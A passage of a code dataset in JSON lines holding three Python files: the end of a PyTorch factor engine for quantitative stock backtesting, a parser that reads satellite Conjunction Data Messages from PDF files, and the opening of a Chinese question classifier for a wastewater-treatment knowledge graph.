Union[torch.Tensor, pd.Series], group: str) -> torch.Tensor:\n if isinstance(data, torch.Tensor):\n return self._groups[group].split(data)\n elif isinstance(data, pd.Series):\n data = torch.tensor(data.values, device=self._device)\n return self._groups[group].split(data)\n elif isinstance(data, np.ndarray):\n data = torch.tensor(data, device=self._device)\n return self._groups[group].split(data)\n else:\n raise ValueError('Invalid data type, should be tensor or series.')\n\n # private:\n\n def _prepare_tensor(self, start, end, max_backwards):\n # Check cache, just in case, if use some ML techniques, engine may be called repeatedly\n # with same date range.\n if start == self._last_load[0] and end == self._last_load[1] \\\n and max_backwards <= self._last_load[2]:\n return\n self._groups = dict()\n\n # Get data\n df = self._loader.load(start, end, max_backwards).copy()\n # If possible, pre-screen\n if isinstance(self._filter, StaticAssets):\n df = df.loc[(slice(None), self._filter.assets), :]\n if df.shape[0] == 0:\n raise ValueError(\"The assets {} specified by StaticAssets filter, was not found in \"\n \"DataLoader.\".format(self._filter.assets))\n # check history data is insufficient\n df.index = df.index.remove_unused_levels()\n history_win = df.index.levels[0].get_loc(start, 'bfill')\n if history_win < max_backwards:\n warnings.warn(\"Historical data seems insufficient. \"\n \"{} rows of historical data are required, but only {} rows are obtained. \"\n \"It is also possible that `calender_asset` of the loader is not set, \"\n \"some out of trading hours data will cause indexing problems.\"\n .format(max_backwards, history_win),\n RuntimeWarning)\n # post processing data\n if self._align_by_time:\n # since pandas 0.23, MultiIndex reindex is slow, so using a alternative way here,\n # but still very slow.\n # df = df.reindex(pd.MultiIndex.from_product(df.index.levels))\n df = df.unstack(level=1).stack(dropna=False)\n if self.timezone != 'UTC':\n df = df.reset_index('asset').tz_convert(self.timezone)\\\n .set_index(['asset'], append=True)\n\n self._dataframe = df\n self._dataframe_index = [df.index.get_level_values(i) for i in range(len(df.index.levels))]\n\n # asset group\n cat = self._dataframe_index[1].codes\n keys = torch.tensor(cat, device=self._device, dtype=torch.int32)\n self._groups['asset'] = ParallelGroupBy(keys)\n\n # time group prepare\n self.column_to_parallel_groupby_(self._loader.time_category, 'date')\n\n self._column_cache = {}\n if isinstance(self._filter, StaticAssets):\n # if pre-screened, don't cache data, only cache full data.\n self._last_load = [None, None, None]\n else:\n self._last_load = [start, end, max_backwards]\n\n def _compute_and_revert(self, f: BaseFactor, name) -> torch.Tensor:\n stream = None\n if self._device.type == 'cuda' and self._enable_stream:\n stream = torch.cuda.current_stream()\n data = f.compute_(stream)\n return self._groups[f.groupby].revert(data, name)\n\n # public:\n\n def __init__(self, loader: DataLoader) -> None:\n self._loader = loader\n self._dataframe = None\n self._dataframe_index = None\n self._groups = dict()\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._factors = {}\n self._filter = None\n self._device = torch.device('cpu')\n self._enable_stream = False\n self._align_by_time = False\n self.timezone = 'UTC'\n\n @property\n def device(self):\n return self._device\n\n @property\n def dataframe_index(self):\n return self._dataframe_index\n\n def create_tensor(self, group: str, dtype, values, nan_values) -> torch.Tensor:\n return self._groups[group].create(dtype, values, nan_values)\n\n @property\n def align_by_time(self):\n return self._align_by_time\n\n @align_by_time.setter\n def align_by_time(self, enable: bool):\n \"\"\"\n If `enable` is `True`, df index will be the product of 'date' and 'asset'.\n This method is slow, recommended to do it in your DataLoader in advance.\n \"\"\"\n self._align_by_time = enable\n\n def add(self,\n factor: Union[Iterable[BaseFactor], BaseFactor],\n name: Union[Iterable[str], str],\n replace=False) -> None:\n \"\"\"\n Add factor or filter to engine, as a column.\n \"\"\"\n if isinstance(factor, Iterable):\n for i, fct in enumerate(factor):\n self.add(fct, name and name[i] or None)\n else:\n if name in self._factors and not replace:\n raise KeyError('A factor with the name {} already exists.'\n 'please specify a new name by engine.add(factor, new_name)'\n .format(name))\n self._factors[name] = factor\n\n def set_filter(self, factor: Union[FilterFactor, None]) -> None:\n self._filter = factor\n\n def get_filter(self):\n return self._filter\n\n def get_factor(self, name):\n return self._factors[name]\n\n @property\n def factors(self):\n return self._factors.copy()\n\n def clear(self):\n self.remove_all_factors()\n self.set_filter(None)\n\n def empty_cache(self):\n self._last_load = [None, None, None]\n self._column_cache = {}\n self._groups = dict()\n self._dataframe = None\n self._dataframe_index = None\n\n def remove_all_factors(self) -> None:\n self._factors = {}\n\n def to_cuda(self, enable_stream=False) -> None:\n \"\"\"\n Set enable_stream to True allows pipeline branches to calculation simultaneously.\n However, this will lead to more VRAM usage and may affect performance.\n \"\"\"\n self._device = torch.device('cuda')\n self._enable_stream = enable_stream\n self.empty_cache()\n\n def to_cpu(self) -> None:\n self._device = torch.device('cpu')\n self.empty_cache()\n\n def test_lookahead_bias(self, start, end):\n \"\"\"Check all factors, if there are look-ahead bias\"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n # get results\n df_expected = self.run(start, end)\n # modify future data\n dt_index = self._dataframe[start:].index.get_level_values(0).unique()\n mid = int(len(dt_index) / 2)\n mid_left = dt_index[mid-1]\n mid_right = dt_index[mid]\n length = self._dataframe.loc[mid_right:].shape[0]\n for col in self._loader.ohlcv:\n self._dataframe.loc[mid_right:, col] = np.random.randn(length)\n self._column_cache = {}\n # hack to disable reload _dataframe\n max_backwards = max([f.get_total_backwards_() for f in self._factors.values()])\n if self._filter:\n max_backwards = max(max_backwards, self._filter.get_total_backwards_())\n self._last_load = [start, end, max_backwards]\n # check if results are consistent\n df = self.run(start, end)\n # clean\n self.empty_cache()\n\n try:\n pd.testing.assert_frame_equal(df_expected[:mid_left], df[:mid_left])\n except AssertionError:\n raise RuntimeError('A look-ahead bias was detected, please check your factors code')\n return 'No assertion raised.'\n\n def _run(self, start, end, delay_factor):\n if len(self._factors) == 0:\n raise ValueError('Please add at least one factor to engine, then run again.')\n\n delays = {col for col, fct in self._factors.items() if fct.should_delay()}\n if not delay_factor and len(delays) > 0:\n warnings.warn(\"Warning!! delay_factor is set to False, \"\n \"but {} factors uses data that is only available \"\n \"after the market is closed.\".format(str(delays)),\n RuntimeWarning)\n delays = {}\n\n # make columns to data factors.\n if self._loader.ohlcv is not None:\n OHLCV.open.inputs = (self._loader.ohlcv[0], self._loader.adjustment_multipliers[0])\n OHLCV.high.inputs = (self._loader.ohlcv[1], self._loader.adjustment_multipliers[0])\n OHLCV.low.inputs = (self._loader.ohlcv[2], self._loader.adjustment_multipliers[0])\n OHLCV.close.inputs = (self._loader.ohlcv[3], self._loader.adjustment_multipliers[0])\n OHLCV.volume.inputs = (self._loader.ohlcv[4], self._loader.adjustment_multipliers[1])\n\n # shift factors if necessary\n filter_ = self._filter\n if filter_ and filter_.should_delay() and delay_factor:\n filter_ = filter_.shift(1)\n factors = {col: col in delays and fct.shift(1) or fct\n for col, fct in self._factors.items()}\n\n # calculate how much historical data is needed\n max_backwards = max([f.get_total_backwards_() for f in factors.values()])\n if filter_:\n max_backwards = max(max_backwards, filter_.get_total_backwards_())\n\n # copy data to tensor\n self._prepare_tensor(start, end, max_backwards)\n\n # clean up before start (may be keyboard interrupted)\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n # some pre-work\n if filter_:\n filter_.pre_compute_(self, start, end)\n for f in factors.values():\n f.pre_compute_(self, start, end)\n\n # schedule possible gpu work first\n results = {col: self._compute_and_revert(fct, col) for col, fct in factors.items()}\n shifted_mask = None\n if filter_:\n shifted_mask = self._compute_and_revert(filter_, 'filter')\n\n # do clean up again\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n return results, shifted_mask, len(delays) > 0\n\n def run(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> pd.DataFrame:\n \"\"\"\n Compute factors and filters, return a df contains all.\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n # do cpu work and synchronize will automatically done by torch\n ret = pd.DataFrame(index=self._dataframe.index.copy())\n ret = ret.assign(**{col: t.cpu().numpy() for col, t in results.items()})\n if shifted_mask is not None:\n ret = ret[shifted_mask.cpu().numpy()]\n\n # if any factors delayed, return df also should be delayed\n if delayed:\n index = ret.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if (start_ind + 1) >= len(index):\n raise ValueError('There is no data between start and end.')\n start = index[start_ind + 1]\n return ret.loc[start:]\n\n def run_raw(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> Dict[str, torch.Tensor]:\n \"\"\"\n Compute factors and filters, return a dict contains factor_name = torch.Tensor\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n\n index = self._dataframe.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if delayed: # if any factors delayed, return df also should be delayed\n start_ind += 1\n if start_ind >= len(index):\n raise ValueError('There is no data between start and end.')\n if shifted_mask is not None:\n shifted_mask = shifted_mask[start_ind:]\n results = {k: v[start_ind:][shifted_mask] for k, v in results.items()}\n else:\n results = {k: v[start_ind:] for k, v in results.items()}\n return results\n\n def get_factors_raw_value(self):\n stream = None\n if self._device.type == 'cuda':\n stream = torch.cuda.current_stream()\n return {c: f.compute_(stream) for c, f in self._factors.items()}\n\n def get_price_matrix(self,\n start: Union[str, pd.Timestamp],\n end: Union[str, pd.Timestamp],\n prices: ColumnDataFactor = OHLCV.close,\n ) -> pd.DataFrame:\n \"\"\"\n Get the price data for Factor Return Analysis.\n :param start: same as run\n :param end: should be longer than the `end` time of `run`, for forward returns calculations.\n :param prices: prices data factor. If you traded at the opening, you should set it\n to OHLCV.open.\n \"\"\"\n factors_backup = self._factors\n self._factors = {'price': AdjustedColumnDataFactor(prices)}\n\n # get tickers first\n assets = None\n if self._filter is not None:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n assets_ret = self.run(start, end, delay_factor=False)\n assets = assets_ret.index.get_level_values(1).unique()\n\n filter_backup = self._filter\n self._filter = StaticAssets(assets)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n ret = self.run(start, end, delay_factor=False)\n self._factors = factors_backup\n self._filter = filter_backup\n\n ret = ret['price'].unstack(level=[1])\n return ret\n\n def plot_chart(self, start, end, trace_types=None, styles=None, delay_factor=True,\n inline=True):\n \"\"\"\n Plotting common stock price chart for researching.\n :param start: same as engine.run()\n :param end: same as engine.run()\n :param delay_factor: same as engine.run()\n :param trace_types: dict(factor_name=plotly_trace_type), default is 'Scatter'\n :param styles: dict(factor_name=plotly_trace_styles)\n :param inline: display plot immediately\n\n Usage::\n\n engine = factors.FactorEngine(loader)\n engine.timezone = 'America/New_York'\n engine.set_filter(factors.StaticAssets({'NVDA', 'MSFT'}))\n engine.add(factors.MA(20), 'MA20')\n engine.add(factors.RSI(), 'RSI')\n engine.to_cuda()\n engine.plot_chart('2017', '2018', styles={\n 'MA20': {\n 'line': {'dash': 'dash'}\n },\n 'RSI': {\n 'yaxis': 'y3',\n 'line': {'width': 1}\n }\n })\n\n \"\"\"\n df = self.run(start, end, delay_factor)\n figs = plot_chart(self._dataframe, self.loader_.ohlcv, df, trace_types=trace_types,\n styles=styles, inline=inline)\n return figs, df\n\n def full_run(self, start, end, trade_at='close', periods=(1, 4, 9),\n quantiles=5, filter_zscore=20, demean=True, preview=True\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Return this:\n | \t | \t| Returns | factor_name \t|\n |date\t |asset\t|10D\t |factor\t |factor_quantile\t|\n |---------------------------|-------|-----------|-----------|-------------------|\n |2014-01-08 00:00:00+00:00\t|ARNC\t|0.070159\t|0.215274\t|5 |\n | |BA\t |-0.038556\t|-1.638784\t|1 |\n For alphalens analysis, you can use this:\n factor_data = full_run_return[['factor_name', 'Returns']].droplevel(0, axis=1)\n al.tears.create_returns_tear_sheet(factor_data)\n :param str, pd.Timestamp start: Factor analysis start time\n :param str, pd.Timestamp end: Factor analysis end time\n :param trade_at: Which price for forward returns. 'open', or 'close.\n If is 'current_close', same as run engine with delay_factor=False,\n Be sure that no any high,low,close data is used in factor, otherwise will\n cause lookahead bias.\n :param periods: Forward return periods\n :param quantiles: Number of quantile\n :param filter_zscore: Drop extreme factor return, for stability of the analysis.\n :param demean: Whether the factor is converted into a hedged weight: sum(weight) = 0\n :param preview: Display a preview chart of the result\n \"\"\"\n factors = self._factors.copy()\n universe = self.get_filter()\n\n column_names = {}\n # add quantile factor of all factors\n for c, f in factors.items():\n self.add(f.quantile(quantiles, mask=universe), c + '_q_')\n self.add(f.to_weight(mask=universe, demean=demean), c + '_w_')\n column_names[c] = (c, 'factor')\n column_names[c + '_q_'] = (c, 'factor_quantile')\n column_names[c + '_w_'] = (c, 'factor_weight')\n\n # add the rolling returns of each period, use AdjustedColumnDataFactor for best performance\n shift = -1\n inputs = (AdjustedColumnDataFactor(OHLCV.close),)\n if trade_at == 'open':\n inputs = (AdjustedColumnDataFactor(OHLCV.open),)\n elif trade_at == 'current_close':\n shift = 0\n from .basic import Returns\n for n in periods:\n # Different: returns here diff by bar, which alphalens diff by time\n ret = Returns(win=n + 1, inputs=inputs).shift(-n + shift)\n mask = universe\n if filter_zscore is not None:\n # Different: The zscore here contains all backward data which alphalens not counted.\n zscore_factor = ret.zscore(groupby='asset', mask=universe)\n zscore_filter = zscore_factor.abs() <= filter_zscore\n if mask is not None:\n mask = mask & zscore_filter\n else:\n mask = zscore_filter\n self.add(ret.filter(mask), str(n) + '_r_')\n else:\n self.add(ret, str(n) + '_r_')\n self.add(ret.demean(mask=mask), str(n) + '_d_')\n\n # run and get df\n factor_data = self.run(start, end, trade_at != 'current_close')\n self._factors = factors\n factor_data.index = factor_data.index.remove_unused_levels()\n # factor_data.sort_index(inplace=True) # 140 ms\n assert len(factor_data.index.levels[0]) > max(periods) - shift, \\\n 'No enough data for forward returns, please expand the end date'\n last_date = factor_data.index.levels[0][-max(periods) + shift - 1]\n factor_data = factor_data.loc[:last_date]\n\n # infer freq\n delta = min(factor_data.index.levels[0][1:] - factor_data.index.levels[0][:-1])\n unit = delta.resolution_string\n freq = int(delta / pd.Timedelta(1, unit))\n # change columns name\n period_cols = {n: str(n * freq) + unit for n in periods}\n for n, period_col in period_cols.items():\n column_names[str(n) + '_r_'] = ('Returns', period_col)\n column_names[str(n) + '_d_'] = ('Demeaned', period_col)\n new_cols = pd.MultiIndex.from_tuples([column_names[c] for c in factor_data.columns])\n factor_data.columns = new_cols\n factor_data.sort_index(axis=1, inplace=True)\n\n # mean return, return std err\n mean_return = pd.DataFrame(columns=pd.MultiIndex.from_arrays([[], []]))\n for fact_name, _ in factors.items():\n group = [(fact_name, 'factor_quantile'), 'date']\n grouped_mean = factor_data[['Demeaned', fact_name]].groupby(group).agg('mean')\n for n, period_col in period_cols.items():\n demean_col = ('Demeaned', period_col)\n mean_col = (fact_name, period_col)\n mean_return[mean_col] = grouped_mean[demean_col]\n mean_return.index.set_names('quantile', level=0)\n mean_return = mean_return.groupby(level=0).agg(['mean', 'sem'])\n mean_return.sort_index(axis=1, inplace=True)\n\n # plot\n if preview:\n plot_quantile_and_cumulative_returns(factor_data, mean_return)\n\n return factor_data, mean_return\n","repo_name":"Heerozh/spectre","sub_path":"spectre/factors/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":23232,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"53"} +{"seq_id":"13059378417","text":"\"\"\"CDM module.\n\nThis module loads CDMS either from a .pdf-file or from the SQL database.\n\nExample\n-------\n\nNotes\n-----\n\nAttributes\n----------\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport fitz # this is pymupdf\nfrom datetime import datetime, timezone\nimport mysql.connector as sql\nfrom sqlalchemy import create_engine\nfrom astropy import units as u\n\n\nclass CDM:\n \"\"\"\n A Conjunction Data Message.\n Further information: https://public.ccsds.org/Pubs/508x0b1e2c2.pdf\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n \n \"\"\"\n # self.objectA = SatObject(\"ObjectA\")\n # self.objectB = SatObject(\"ObjectB\")\n \n\n def load_cdm_from_pdf(self, filename):\n \"\"\"\n Loads a CDM from a .pdf file.\n \"\"\"\n doc = fitz.open(filename) # open document\n for page in doc: # iterate the document pages\n text = str(page.get_text().encode(\"utf8\")) # get plain text (is in UTF-8)\n # TODO: add test for more than one pdf page\n \n lines = text.split('\\\\n')\n\n self.generation_date = datetime.strptime(lines[2].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M').replace(tzinfo=timezone.utc)\n # print(generation_date)\n\n self.ccsds_cdm_vers = lines[5].rpartition(\":\")[2].strip()\n # print(ccsds_cdm_vers)\n self.creation_date = datetime.strptime(lines[6].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S').replace(tzinfo=timezone.utc)\n # print(creation_date)\n self.originator = lines[7].rpartition(\":\")[2].strip()\n # print(originator)\n self.message_for = lines[8].rpartition(\":\")[2].strip()\n # print(message_for)\n self.message_id = lines[9].rpartition(\":\")[2].strip()\n # print(message_id)\n\n self.tca = datetime.strptime(lines[11].split(\": \")[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc)\n # print(tca)\n self.miss_distance = float(lines[12].split(\": \")[1].strip())\n # print(miss_distance)\n self.relative_speed = float(lines[13].split(\": \")[1].strip())\n # print(relative_speed)\n rel_position_R = float(lines[14].split(\": \")[1].strip())\n # print(relative_position_R)\n rel_position_T = float(lines[15].split(\": \")[1].strip())\n # print(relative_position_T)\n rel_position_N = float(lines[16].split(\": \")[1].strip())\n # print(relative_position_N)\n self.rel_position_RTN = np.array([[rel_position_R],[rel_position_T],[rel_position_N]])\n self.collision_prob = float(lines[17].split(\": \")[1].strip())\n # print(collision_prob)\n self.collision_prob_method = lines[18].split(\": \")[1].strip()\n # print(collision_prob_method)\n\n line = lines[22].split(\": \")[1].strip().split(\" \")\n self.object_designator = [x for x in line if x]\n # print(object_designator)\n line = lines[23].split(\": \")[1].strip().split(\" \")\n self.object_name = [x for x in line if x]\n # print(object_name)\n line = lines[24].split(\": \")[1].strip().split(\" \")\n self.itn_designator = [x for x in line if x]\n # print(itn_designator)\n line = lines[25].split(\": \")[1].strip().split(\" \")\n self.object_type = [x for x in line if x]\n # print(object_type)\n line = lines[26].split(\": \")[1].strip().split(\" \")\n self.operator_organization = [x for x in line if x]\n # print(operator_organization)\n line = lines[27].split(\": \")[1].strip().split(\" \")\n self.ephemeris_name = [x for x in line if x]\n # print(ephemeris_name)\n line = lines[28].split(\": \")[1].strip().split(\" \")\n self.maneuverable = [x for x in line if x]\n # print(maneuverable)\n line = lines[29].split(\": \")[1].strip().split(\" \")\n self.ref_frame = [x for x in line if x]\n # print(ref_frame)\n line = lines[30].split(\" : \")[1].strip().split(\" \")\n self.gravity_model = [x for x in line if x]\n # print(gravity_model)\n line = lines[31].split(\": \")[1].strip().split(\" \")\n self.atmospheric_model = [x for x in line if x]\n # print(atmospheric_model)\n line = lines[32].split(\": \")[1].strip().split(\" \")\n self.n_body_perturbations = [x for x in line if x]\n # print(n_body_perturbations)\n line = lines[33].split(\": \")[1].strip().split(\" \")\n self.solar_rad_pressure = [x for x in line if x]\n # print(solar_rad_pressure)\n line = lines[34].split(\": \")[1].strip().split(\" \")\n self.earth_tides = [x for x in line if x]\n # print(earth_tides)\n line = lines[35].split(\": \")[1].strip().split(\" \")\n self.intrack_thrust = [x for x in line if x]\n # print(intrack_thrust)\n line = lines[36].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_sta = []\n self.time_lastob_sta.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_sta.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_sta)\n line = lines[37].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_end = []\n self.time_lastob_end.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_end.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_end)\n line = lines[38].split(\": \")[1].strip().split(\" \")\n self.rec_od_span = [float(x) for x in line if x]\n # print(rec_od_span)\n line = lines[39].split(\": \")[1].strip().split(\" \")\n self.actual_od_span = [float(x) for x in line if x]\n # print(actual_od_span)\n line = lines[40].split(\": \")[1].strip().split(\" \")\n self.obs_available = [float(x) for x in line if x]\n # print(obs_available)\n line = lines[41].split(\": \")[1].strip().split(\" \")\n self.obs_used = [float(x) for x in line if x]\n # print(obs_used)\n line = lines[42].split(\": \")[1].strip().split(\" \")\n self.residuals_accepted = [float(x) for x in line if x]\n # print(residuals_accepted)\n line = lines[43].split(\": \")[1].strip().split(\" \")\n self.weighted_rms = [float(x) for x in line if x]\n # print(weighted_rms)\n line = lines[44].split(\": \")[1].strip().split(\" \")\n self.area_pc = [float(x) for x in line if x]\n # print(area_pc)\n line = lines[45].split(\": \")[1].strip().split(\" \")\n self.area_drag = [float(x) for x in line if x]\n # print(area_drag)\n line = lines[46].split(\": \")[1].strip().split(\" \")\n self.area_srp = [float(x) for x in line if x]\n # print(area_srp)\n line = lines[47].split(\": \")[1].strip().split(\" \")\n self.mass = [float(x) for x in line if x]\n # print(mass)\n line = lines[48].split(\": \")[1].strip().split(\" \")\n self.cd_am = [float(x) for x in line if x]\n # print(cd_am)\n line = lines[49].split(\": \")[1].strip().split(\" \")\n self.cr_am = [float(x) for x in line if x]\n # print(cr_am)\n line = lines[50].split(\": \")[1].strip().split(\" \")\n self.thrust_acc = [float(x) for x in line if x]\n # print(thrust_acc)\n line = lines[51].split(\": \")[1].strip().split(\" \")\n self.sedr = [float(x) for x in line if x]\n # print(sedr)\n line = lines[52].split(\": \")[1].strip().split(\" \")\n X = [float(x) for x in line if x]\n # print(X)\n line = lines[53].split(\": \")[1].strip().split(\" \")\n Y = [float(x) for x in line if x]\n # print(Y)\n line = lines[54].split(\": \")[1].strip().split(\" \")\n Z = [float(x) for x in line if x]\n # print(Z)\n self.position_XYZ = np.array([X,Y,Z])\n line = lines[55].split(\": \")[1].strip().split(\" \")\n X_dot = [float(x) for x in line if x]\n # print(X_dot)\n line = lines[56].split(\": \")[1].strip().split(\" \")\n Y_dot = [float(x) for x in line if x]\n # print(Y_dot)\n line = lines[57].split(\": \")[1].strip().split(\" \")\n Z_dot = [float(x) for x in line if x]\n # print(Z_dot)\n self.position_dot_XYZ = np.array([X_dot,Y_dot,Z_dot])\n\n line = lines[59].split(\": \")[1].strip().split(\" \")\n self.apogee = [float(x) for x in line if x]\n # print(apogee)\n line = lines[60].split(\": \")[1].strip().split(\" \")\n self.perigee = [float(x) for x in line if x]\n # print(perigee)\n line = lines[61].split(\": \")[1].strip().split(\" \")\n self.eccentricity = [float(x) for x in line if x]\n # print(eccentricity)\n line = lines[62].split(\": \")[1].strip().split(\" \")\n self.inclination = [float(x) for x in line if x]\n # print(inclination)\n\n line = lines[64].split(\": \")[1].strip().split()\n self.RTN_1sigma = [float(x) for x in line if x]\n # print(RTN_1sigma)\n\n line = lines[66].split(\": \")[1].strip().split()\n RTN_covariance_temp = [float(x) for x in line if x]\n line = lines[67].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n line = lines[68].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n self.RTN_covariance = np.zeros((3,3,2))\n self.RTN_covariance[:,:,0] = np.array([ [RTN_covariance_temp[0],RTN_covariance_temp[2][0],RTN_covariance_temp[3][0]],\n [RTN_covariance_temp[2][0],RTN_covariance_temp[2][1],RTN_covariance_temp[3][1]],\n [RTN_covariance_temp[3][0],RTN_covariance_temp[3][1],RTN_covariance_temp[3][2] ] ])\n self.RTN_covariance[:,:,1] = np.array([ [RTN_covariance_temp[1],RTN_covariance_temp[2][2],RTN_covariance_temp[3][3]],\n [RTN_covariance_temp[2][2],RTN_covariance_temp[2][3],RTN_covariance_temp[3][4]],\n [RTN_covariance_temp[3][3],RTN_covariance_temp[3][4],RTN_covariance_temp[3][5] ] ] )\n","repo_name":"fabrizioturco/CAM_aerodynamic_drag","sub_path":"collisionAvoidanceAnalysis/conjunction_data_message.py","file_name":"conjunction_data_message.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8116048695","text":"#-*- coding : utf-8 -*-\n# coding: utf-8\n\n\nimport os\nimport ahocorasick\n\nclass QuestionClassifier:\n def __init__(self):\n cur_dir = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n # 特征词路径\n self.project_path = os.path.join(cur_dir, 'dict/project.txt')\n self.unit_path = os.path.join(cur_dir, 'dict/unit.txt')\n self.deny_path = os.path.join(cur_dir, 'dict/deny.txt')\n\n # 加载特征词\n self.project_wds= [i.strip() for i in open(self.project_path) if i.strip()]#encoding=\"utf-8\"\n self.unit_wds= [i.strip() for i in open(self.unit_path) if i.strip()]\n\n self.region_words = set(self.project_wds + self.unit_wds)\n # deny是一个反义词的合集,单独由人工列出\n self.deny_words = [i.strip() for i in open(self.deny_path,encoding=\"utf-8\") if i.strip()]\n # 构造领域actree,ac多模式匹配算法里的方法\n self.region_tree = self.build_actree(list(self.region_words))\n # 构建关键词与对应类型的词典\n self.wdtype_dict = self.build_wdtype_dict() #格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n\n\n\n # 工艺参数单位词,人工列出\n self.Qunit_qwds = ['吨/天', '吨每天', 'CMD', 't/d', 'tph', 't/h', 'm3/h', '吨每小时']\n self.Recovunit_qwds = ['%']\n self.CODunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.CIunit_qwds = ['Us', 'us', 'us/cm', 'ms', 'Ms', 'ms/cm']\n self.Hardunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.SSunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n\n\n\n\n # 问句疑问词,人工列出\n self.process_qwds = ['哪些工艺单元','工艺单元有哪些','什么工艺', '什么流程', '什么工艺流程','哪些工艺','工艺有哪些', '哪些流程', '哪些工艺流程','哪种工艺', '哪种流程', '哪种工艺流程','工艺是什么','工艺流程是什么']\n self.project_qwds = ['什么项目', '什么工程', '哪个项目', '哪个工程','项目有哪些','有哪些项目']\n self.unit_qwds = ['什么设备', '什么单元', '哪个设备', '哪个单元']\n\n\n\n\n\n\n print('model init finished ......') #以上是输入问答模型的基础数据\n\n return\n\n '''分类主函数'''\n def classify(self, question):\n data = {}\n project_dict = self.check_project(question) #check_project:用wdtype_dict进行问句过滤,最终构建成一个符合问句的关键词和关键词类型的字典\n if not project_dict:\n return {}\n data['args'] = project_dict # 将关键词和关键词类型的字典输入一个更大的字典data,这里面存储了问题中提到了哪些节点\n #收集问句当中所涉及到的实体类型\n types = []\n for type_ in project_dict.values(): # 将关键词类型的存储为type\n types += type_\n question_type = 'others'\n\n question_types = []\n\n ## 目标解决以下问题\n # 1 知道项目名称查工艺\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 3 知道进出水的水量、水质、回收率的一个或几个参数查工艺\n # 4 知道某个单元的进水或出水工艺参数名称查项目名称\n # 5 查询某个单元的最高、最低、平均进水或出水工艺参数(附加)\n # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n\n # 1 知道项目名称查工艺\n # 如果问句中包含流程查询且明确的项目名称在查询语句中,如:\n # 蒙西污水处理厂的工艺是什么……日铭三期回用水用了哪些工艺……泰州可利放流回用水包含哪些工艺\n if self.check_words(self.process_qwds, question) and ('project' in types):\n question_type = 'project_unit'\n question_types.append(question_type)\n\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 如果问句中包含项目查询且明确的某个单元名称在查询语句中,如:\n # 用了一级二段反渗透的项目有哪些……用自清洗过滤器的有哪些项目……什么项目用了浸没式超滤\n if self.check_words(self.project_qwds, question) and ('unit' in types):\n question_type = 'unit_project'\n question_types.append(question_type)\n\n # # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n # if self.check_words(self.project_qwds, question) and ('unit' in types):\n # question_type = 'wquality_process'\n # question_types.append(question_type)\n #\n\n # 将多个分类结果进行合并处理,组装成一个字典\n data['question_types'] = question_types\n\n\n return data\n\n '''筛选出构造词对应的类型,也就是够造'args'后面的内容'''\n def build_wdtype_dict(self):\n wd_dict = dict()\n for wd in self.region_words:\n wd_dict[wd] = []\n if wd in self.project_wds:\n wd_dict[wd].append('project')\n if wd in self.unit_wds:\n wd_dict[wd].append('unit')\n\n return wd_dict\n #wd_dict格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n ## 格式或为{}\n\n '''构造actree,加速过滤'''\n def build_actree(self, wordlist):\n actree = ahocorasick.Automaton()\n for index, word in enumerate(wordlist):\n actree.add_word(word, (index, word))\n actree.make_automaton()\n return actree\n\n '''问句过滤从wdtype_dict中过滤出符合question的关键词和关键词类型的字典'''\n def check_project(self, question):\n region_wds = []\n for i in self.region_tree.iter(question):\n wd = i[1][1]\n region_wds.append(wd)\n stop_wds = []\n for wd1 in region_wds:\n for wd2 in region_wds:\n if wd1 in wd2 and wd1 != wd2:\n stop_wds.append(wd1)\n final_wds = [i for i in region_wds if i not in stop_wds]\n final_dict = {i:self.wdtype_dict.get(i) for i in 